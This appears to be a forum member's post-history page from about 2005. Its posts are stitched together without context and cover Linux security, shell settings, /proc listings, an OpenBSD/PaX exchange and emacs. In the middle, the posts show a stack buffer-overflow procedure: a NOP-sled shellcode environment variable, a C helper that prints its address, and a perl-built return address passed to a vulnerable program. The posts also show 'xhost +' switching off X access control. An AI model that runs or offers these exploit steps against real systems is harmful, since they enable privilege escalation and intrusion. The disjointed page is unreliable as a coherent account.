91
Unix / Linux Discussion / Re: How to rm yourself
« on: August 14, 2005, 07:11:01 pm »
I'm guessing you also have no way to root me.
Happy New Year! Yes, the current one, not a previous one; this is a new post, we swear!
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
But at any rate, those aren't 100% reliable. They're mitigating factors, for sure, but they might not save me from a smf sql-injection attack that cleverly evades the IPS, or an Apache format-string vuln that lets me overwrite some key address in Apache, giving me unlimited access or something?
Then you don't use the stack.
So you see there are always ways around those kernel security modules. Ways around non-exec stacks, and your stack randomization.
For instance, if you're running the current version of Apache httpd, you still are not safe from attacks to the Apache httpd, because someone could have found a vuln. And guess what, there isn't a patch out yet. So unfortunately, your only chance would be to plug the 0day vuln holes by coding your own patch.
export PS1=`echo -ne "\033[0;34m\u@\h:\033[0;36m\w\033[0;34m\$\033[0;37m "`
export CDPATH=.:~
export HISTSIZE=0
export TMOUT=600
sh-3.00$ set | grep DISPLAY
DISPLAY=:0.0
sh-3.00$ xhost +
access control disabled, clients can connect from any host
sh-3.00$ su -
Password:
root@tmp:~# export DISPLAY=:0.0
root@tmp:~# ethereal
sh-3.00$ cat << EOF > ~/.bashrc
> alias ps='ps aux'
> EOF
sh-3.00$ bash -ic ps | grep xterm
tmp 2659 0.0 0.8 5736 2304 tty1 S Jul15 0:00 xterm -title Terminal
tmp 3909 0.0 1.3 5972 3464 tty1 S 02:22 0:00 xterm -title Terminal
tmp 3978 0.0 0.2 1688 600 pts/3 S+ 02:28 0:00 grep xterm
export SHELLCODE=`perl -e 'print "\x90"x200;'``cat shellcode`
#include <stdlib.h>
int main(int argc, char *argv[]) {
char *addr = getenv(argv[1]);
printf("\n%p\n", addr);
return 0;
}
sh-3.00$ getenv SHELLCODE
SHELLCODE is located at 0xbffff892
sh-3.00$ ./vulnprog `perl -e 'print "\x92\xf8\xff\xbf"x10;'`
The thing about finding your root password is that, if a user can access that file, they already have root on your system.
root@tmp:/proc/1# ls -l
total 0
-r--r--r-- 1 root root 0 2005-06-24 00:43 cmdline
lrwxrwxrwx 1 root root 0 2005-06-24 00:43 cwd -> //
-r-------- 1 root root 0 2005-06-24 00:43 environ
lrwxrwxrwx 1 root root 0 2005-06-24 00:43 exe -> /sbin/init*
dr-x------ 2 root root 0 2005-06-24 00:43 fd/
-r--r--r-- 1 root root 0 2005-06-24 00:43 maps
-rw------- 1 root root 0 2005-06-24 00:43 mem
-r--r--r-- 1 root root 0 2005-06-24 00:43 mounts
lrwxrwxrwx 1 root root 0 2005-06-24 00:43 root -> //
-r--r--r-- 1 root root 0 2005-06-24 00:43 stat
-r--r--r-- 1 root root 0 2005-06-24 00:43 statm
-r--r--r-- 1 root root 0 2005-06-24 00:43 status
root@tmp:/proc/1# cat environ | tr '\0' '\n'
HOME=/
TERM=linux
BOOT_IMAGE=linux
root@tmp:/proc# ls -l kcore
-r-------- 1 root root 279457792 2005-06-24 00:33 kcore
root@tmp:/proc/1# ls -d /proc/* | grep [0-9] | wc -l ; ps ax | wc -l
74
74
So yes it takes awhile to install but I feel its worth it because I can control just about everything that gets installed.
Claim: OpenBSD cannot protect against attacks using mprotect because it would violate POSIX, and OpenBSD does not violate POSIX.
> > We don't break anything that standards defacto standards require. (Theo de Raadt)
> You do break POSIX as pointed out above. (PaX Team)
> > False. Now go away. (Theo de Raadt)
I was asked by a few OpenBSD people why I'm even comparing them here, since "everyone knows" they don't scale well and their goal is security and not scalability.
Also, to use emacs to its fullest, I'd like to learn how to make extensions for it which are written in Lisp.